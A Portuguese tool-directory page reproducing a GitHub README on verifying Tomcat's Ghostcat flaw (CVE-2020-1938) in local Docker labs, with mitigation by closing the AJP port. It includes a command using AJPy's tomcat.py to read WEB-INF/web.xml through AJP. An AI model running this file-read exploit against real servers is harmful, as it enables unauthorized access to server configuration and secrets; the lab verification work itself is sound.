Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ghostcat-verification — Aprendizados sobre como verificar se é vulnerável ao Ghostcat (também conhecido como CVE-2020-1938) | Kitploit
Ferramentas/GitHubGitHub/shaunmclernon/ghostcat-verification
Análise de VulnerabilidadesExploraçãoSegurança WebAprendizado e EducaçãoLabs e Prática
GitHubshaunmclernon/ghostcat-verification

ghostcat-verification

Aprendizados sobre como verificar se é vulnerável ao Ghostcat (também conhecido como CVE-2020-1938)

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
11há 6 anosAinda não revisado

Verificação do Ghostcat (CVE-2020-1938)

Resumo

Um novo exploit chamado Ghostcat foi encontrado CVE-2020-1938, veja os artigos no snyk e tenable para detalhes e análise do exploit em si.

No meu caso, queria verificar quais servidores Tomcat são exploráveis e, se sim, como isso se manifesta. Portanto, este experimento é para verificar o Tomcat 7, 8 e 9.

Pré-requisitos

  • docker
  • python
  • git

Lendo arquivo usando CVE-2020-1938 no Tomcat 7

TODO: Como verificar se um Tomcat 7 é vulnerável?

Lendo arquivo usando CVE-2020-1938 no Tomcat 8

Em vez de testar exploits em servidores ativos, estou usando compilações existentes do Tomcat para realizar meu experimento usando o AJPy que cria requisições AJP para se comunicar com conectores AJP.

root@kitploit:~
git clone --recurse-submodules [email protected]:shaunmclernon/ghostcat-verification.git
cd ghostcat-verification/AJPy
docker run --name tomcat --rm -d -p 8080:8080 -p 8009:8009 tomcat:8.5.32
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat

Se ele retornar o web.xml, então esta versão do Tomcat é vulnerável ao exploit.

Se tentarmos o mesmo teste usando a versão mais recente do Tomcat 8.5, podemos ver que não é vulnerável a este erro específico.

root@kitploit:~
docker run --name tomcat --rm -d -p 8080:8080 -p 8009:8009 tomcat:8.5
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat

Neste caso, devemos obter um erro do python, o que na verdade significa que o servidor não é vulnerável;

root@kitploit:~
Traceback (most recent call last):
  File "tomcat.py", line 377, in <module>
    hdrs, data = bf.perform_request("/" + args.webapp + "/xxxxx.jsp", attributes=attributes)
    ...
    ...
struct.error: unpack requires a buffer of 5 bytes

Lendo arquivo usando CVE-2020-1938 no Tomcat 9

TODO: Como verificar se um Tomcat 9 é vulnerável?

Springboot

TODO: Como verificar se um serviço Springboot é vulnerável?

Mitigação

Obviamente, se for vulnerável (independentemente da versão), você deve considerar atualizar para as versões corrigidas. Outra opção é bloquear o acesso à porta AJP.

Inicie a mesma versão do Tomcat, mas não exponha a porta AJP 8009.

root@kitploit:~
docker run --name tomcat --rm -d -p 8080:8080 tomcat:8.5.32
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat

Neste caso, podemos ver que ele falhará ao explorar o servidor.

Aviso Legal

Não sou um profissional de segurança e este repositório foi criado para fins de aprendizado, não se destina a ser usado para fins maliciosos.

Baixar ferramenta